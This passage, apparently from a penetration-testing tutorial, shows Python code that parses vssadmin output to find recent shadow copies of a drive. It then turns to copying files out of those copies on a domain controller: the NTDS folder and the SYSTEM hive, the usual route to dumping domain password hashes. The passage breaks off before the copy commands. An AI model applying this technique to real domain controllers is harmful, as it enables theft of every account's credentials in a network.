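            set_id = m.group(1)
            continue
        m = TIME_RE.search(line)
        if m:
            created = datetime.strptime(m.group(1).strip(), TIME_FORMAT)
            continue
        m = ID_RE.search(line)
        if m:
            # a copy inherits the set id and creation time of the set header above it
            shadows.append({"set_id": set_id, "created": created, "id": m.group(1)})
            continue
        m = VOL_RE.search(line)
        if m and shadows:
            shadows[-1]["drive"] = m.group(1).upper()
            continue
        m = DEV_RE.search(line)
        if m and shadows:
            shadows[-1]["device"] = m.group(1)
    return shadows


def recent_shadow_devices(text, drive, now_text, max_age_days=1):
    """Device paths of copies of `drive` created within max_age_days of now_text, newest first."""
    now = datetime.strptime(now_text, TIME_FORMAT)
    fresh = [s for s in parse_vssadmin(text)
             if s.get("drive") == drive.upper()
             and now - s["created"] <= timedelta(days=max_age_days)]
    fresh.sort(key=lambda s: s["created"], reverse=True)
    return [s["device"] for s in fresh]


if __name__ == "__main__":
    print(recent_shadow_devices(SAMPLE_LISTING, "C", "5/31/2013 12:00:00 PM"))
```

On a DC whose NTDS folder lives on another drive, pass that drive letter instead of C; the Original Volume line is what the filter matches on, not the machine name.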
Next we just copy the files out of the shadow copies. First the SYSTEM hive: